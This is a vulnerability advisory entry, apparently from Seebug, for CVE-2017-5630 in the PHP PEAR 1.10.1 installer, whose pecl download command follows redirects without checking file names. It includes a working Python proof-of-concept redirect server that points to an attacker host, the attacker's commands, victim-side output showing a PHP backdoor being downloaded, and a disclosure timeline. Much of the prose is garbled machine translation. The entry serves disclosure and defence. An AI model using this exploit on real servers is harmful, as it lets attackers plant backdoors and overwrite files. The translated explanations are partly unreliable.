PHP PEAR 1.10.1 - arbitrary File Download Vulnerability (CVE-2017-5630)

2017-02-01T00:00:00
ID SSV:92633
Type seebug
Reporter Root
Modified 2017-02-01T00:00:00

Description

Author: mapl0

Vulnerability details

In the PEAR Base System The 1. 10. 1 version of the installer, can be in after the redirect does not verify file type and file name, and then allows the remote http server via a specially crafted request to overwrite the hacked server files, such as. htaccess is. When the attacker to run pecl download When you can trigger the vulnerability.

pear not because of the with original file names duplicate and rename the invalid file. Therefore, the attacker can overwrite the original file or the download of a backdoor, the premise is pecl the request is from web directories.

Moreover, the pecl are not deleted by this method to get the file, thus giving the attacker time in the file is noted before going to brute force the back door file.

POC Video: https://vimeo.com/201341280 The original version of you. https://pan.baidu.com/s/1dFaHTxZ Personal recording, the clarity is a bit poor

Point to prove:

This poc has three key points: First and foremost, the victim issued a pecl download command request. Then is the attacker the server receives a file download request. The last is a php Backdoor to be attacker to obtain.

1)The Victim Server attempts to download legitimate. tgz file.

pecl download http://VULN-SERVER:8080/Test.tgz

2)the attacker's server receives the test. tgz request and reply.

3) pecl unintentionally download a malicious php Backdoor

The attackers on the server run:

python-m SimpleHTTPServer 8888

python PECL-File-Exploit.py

import socket

HOST='localhost'
PORT=8080
TARGET='http://EVIL-SERVER:8888/'
FILE='. htaccess'
s = socket. socket()
s. bind((HOST, PORT))
s. listen(10)

print 'Waiting for PECL connections...'


while True:
 conn, addr = s. accept()
 junk = conn. recv(512)
 conn. send('HTTP/1.1 302 Found\r\n')
 conn. send('Location: '+TARGET+FILE+'\r\n')
conn. close()
s. close()

When the attacked server to download the file:

C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz

downloading Evil.php ... Starting to download Evil.php (4,665 bytes) ..... done: 4,665 bytes

It will, incidentally, leave the back door download to the current directory File C:\xampp\htdocs\webapp\Evil.php downloaded

Personal summary: the exploit conditions there are harsh, need to be the attacker active in the web directory of running perl, and the target url need to be the attacker's server. However, the vulnerability to be used on a social networking site phishing, the danger is also great.

Disclosure Timeline:

  • Vendor Notification: January 11, 2017
  • Informed "PECL package no longer maintained" on : January 23, 2017
  • Opened Bug #2117 : January 25, 2017
  • January 29, 2017 : Public Disclosure

References: https://www.exploit-db.com/exploits/41185/